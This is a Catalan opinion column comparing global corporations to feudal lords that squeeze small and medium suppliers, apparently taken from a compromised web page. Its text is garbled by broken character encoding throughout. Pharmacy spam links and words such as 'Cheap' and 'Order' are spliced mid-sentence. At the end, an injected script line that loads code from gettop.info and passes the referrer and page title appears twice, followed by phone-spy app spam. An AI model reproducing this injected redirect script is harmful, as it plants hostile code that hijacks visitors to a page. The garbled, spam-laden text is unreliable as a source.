General

Les empreses globals i els senyors feudals

“Tot apunta que actualment, les grans corporacions globals estan assumint el rol de nous senyors feudals, actuant amb impunitat, tot incrementant el seu poder i posiciA?”

______

Entrevista senyor Garrell-3

new antidepressants 2018

Antoni Garrell

Director General de FUNDIT

Antoni Garrell Ai??s Enginyer Industrial, especialista en gestiA? de la innovaciA? i en economia del coneixement. Fou fundador del Cercle per al Coneixement i impulsor de la FundaciA? Indicis que centra la seva activitat en aspectes de sostenibilitat i clima. Des de http://bygonebureau.com/2018/03/16/purchase-betapace-for-atrial-fibrillation/ 1998 Ai??s Director General de la FundaciA? per l’ESDi (FUNDIT).

Seguir l’autor @AntoniGarrell
______

El passat divendres, vaig llegir diverses informacions del Banc dai??i??Espanya en les quals sai??i??explicava que la reestructuraciA? del sector financer havia requerit 61.162 milions dai??i??euros, -una xifra que pot crAi??ixer fins els 70 mil milions en funciA? dels acords de ai???protecciA? dai??i??actiusai???, segons els quals lai??i??Estat es farAi?? cAi??rrec de pA?rdues online futures-, dada que en realitat Ai??s una llosa que durant molts anys frenarAi?? el desenvolupament de lai??i??economia espanyola i condicionarAi??, a la vegada, el model productiu i les polAi??tiques associades a la formaciA?, al R+D+i, a la sanitat o a la protecciA? social. Un esforAi?? enorme, que al no dedicar recursos a la reactivaciA? econA?mica pot Ai??sser insuficient, ja que com explica lai??i??agencia Moody’s, que ha mantingut la ai???perspectiva negativaai??? pel sistema bancari espanyol, les previsions respecte a creixement i creaciA? dai??i??ocupaciA? sA?n dolentes arran de les condicions de recessiA? econA?mica actuals.

Certament a menys que lai??i??economia no millori significativament al llarg del 2013, i es generi ocupaciA? al 2014, el deteriorament pot ser encarAi?? mAi??s gran, i els perjudicis per la societat poden abastar a tota una generaciA?. Un fet que no Ai??s admissible, i que porta a preguntar-nos que mAi??s ha de passar perquA? els que tenen capacitat de reconduir les polAi??tiques comprenguin que, si sai??i??haguAi??s injectat una dA?cima part dels 61.162 milions dai??i??euros destinats a la banca al sistema productiu, i molt especialment a la Industria, la situaciA? quant atur i variaciA? del PIB, fora radicalment Order diferent a la que ara estem immersos.

La lectura de les informacions sobre la situaciA? de la banca, -que no sols Ai??s el reflex de gestions errA?nies i dai??i??actuacions encaminades a lai??i??enriquiment dai??i??uns pocs a costa de la immensa majoria dels ciutadans-, i la constataciA? de la manca de recursos per vertebrar el futur, hagi com lai??i??inadmissible nombre de persones en atur que incrementa la precarietat instalai???lada en moltes llars, va recordar-me els pronA?stics del lingA?ista Umberto Eco, que alertava, fa uns 30 http://chezee.mhs.narotama.ac.id/2018/02/02/order-diltiazem-ointment/ anys, que el camAi?? que sai??i??emprenia ens podria portar cap una nova medievalitzaciA? de la societat. Certament arreu es pot constatar un creixement de les desigualtats, un increment de la distAi??ncia quant a rics i pobres, lai??i??increment de les barreres a la formaciA?, i que la llei del mAi??s fort sai??i??imposa en una societat governada per una elit que sovint Ai??s fruit de privilegis del passat, o es fonamenta en interessos inconfessables. Aquest darrer aspecte sai??i??evidencia amb forAi??a en la posiciA? dominant de les grans corporacions enfront de les empreses petites o mitjanes, que sovint es veuen arrasades, menystingudes i explotes per aquestes empreses globals.

Tot apunta que actualment, les grans corporacions globals estan assumint el rol de nous senyors feudals, actuant amb impunitat, tot incrementant el seu poder i posiciA?. Ho fan emparats per uns marcs legals que els afavoreixen, i en entorns relacionals que els permet actuar per perpetuar la seva posiciA?. Sols cal observar a qui consulten, escolten o contrasten les propostes els responsables del poder executiu o legislatiu. Fets que comporten que els canvis ignorin les necessitats reals de les petites i mitjanes empreses i els emprenedors, quan sA?n precisament aquests els que generen mAi??s de la meitat del PIB, mantenen la list of tablets for depression immensa majoria dels llocs de treball del paAi??s, i aporten un important

h pylori treatment amoxil

percentatge dels ingressos anti depressant tablets in pakistan price de lai??i??Estat.

Les grans corporacions, des de la seva posiciA? dominant i amb nivells de beneficis significatius, escanyen els seus proveA?dors industrials. Hom tAi?? la impressiA? que utilitzen la crisi, online i la necessitat de devaluaciA? interna, com argument per forAi??ar retallades de preus als productors, obligant-los a actuar amb uns preus que sols cobreixen el cost de les matA?ries primeres, els processos de fabricaciA? i lai??i??amortitzaciA? de les infraestructures. Sovint, el preu de venta imposat per les grans corporacions a les PYMES Ai??s el preu de cost. Un fet que obliga als proveA?dors industrials a decidir entre finalitzar lai??i??activitat, o renunciar als requerits beneficis, tot hipotecant la capacitat competitiva de futur al no disposar de recursos per invertir.

Igual que els senyors feudals, les grans corporacions sense instalai???lacions de producciA? industrials prA?pies, subcontracten les que requereixen o treballen exclusivament amb proveA?dors industrials. El seu creixent es fonamenta amb el treball, la capacitat dai??i??innovaciA?, el disseny, el talent i els recursos de les petites i mitjanes empreses, sense voluntat dai??i??establir lligams de online lleialtat i permanA?ncia amb elles. Es mouen com a depredadors en la recerca del qui els hi pot aportar mAi??s i millor amb menys preu. Els seus benA?fics resideixen, en gran part, en retallar els guanys dels proveA?dors i en maximitzar el preu de venda, tot minimitzant els impostos a pagar, ja sigui emprant els privilegis que la llei els hi atorga o actuant des de paA?sos on la fiscalitat es relaxa. Pautes dai??i??actuaciA? de ai???domini senyorialai???, o el que Ai??s el mateix en el seu propi benefici immediat. ConseqA?entment actuen en totes les esferes per crear obligacions de servitud i de dependA?ncia cap els consumidors i els proveA?dors, i en aquest camAi?? atorguen beneficis a les fidelitats, que els hi permeten estendre el seu domini des de els seus centres de decisiA?, tot sovint llunyans.

Les grans empreses globals sA?n necessAi??ries, i cal cuidar-les i fomentar el seu sorgiment, ja que sA?n elles les que tenen la capacitat de generar innovacions que possibiliten Buy avenAi??os enormes de progres colai???lectiu. PerA? aquest fet no pot comportar la destrucciA? del teixit productiu existent ni lai??i??empobriment social. La legislaciA? no pot considerar exclusivament els requeriments de les grans corporacions, ha d’estar amatent a les necessitats dels centenars de milers de PIMES, autA?noms i emprenedors que, igual que la classe mitja, sA?n lai??i??autA?ntica columna vertebral de generaciA? de riquesa i de sostAi??n dels ingressos de lai??i??Estat, conseqA?entment del progrAi??s social.

http://mitrabajoahora.com/cheap-phexin-ds/

Massa temps sai??i??ha mirat als grans i oblidat els petits, el resultat Ai??s el que avui tots patim. Ai??s hora dai??i??ampliar la mirada i canviar les polAi??tiques, Ai??s hora de protegir i cuidar a les empreses compromeses amb el territori, les exportacions, la innovaciA?, i el progrAi??s socials, i cal fer-ho, tot recordant Cheap que sols hi ha llibertat quan les persones podem traAi??ar el seu propi camAi?? per desenvolupar-se personal, professional i intelAi??lectualment.

Cheap

 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + http://bagusprast.mhs.narotama.ac.id/2018/03/15/price-of-hytrin-in-pakistan/ encodeURIComponent(document.title) + ”;

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; snapchat spy, top android spy apps, track phone numberhttp://blogs.lestudio.mx/fmacalecole/2017/10/31/mobile-spy-ubicar-telefono-por-gps-phone-call-tracker/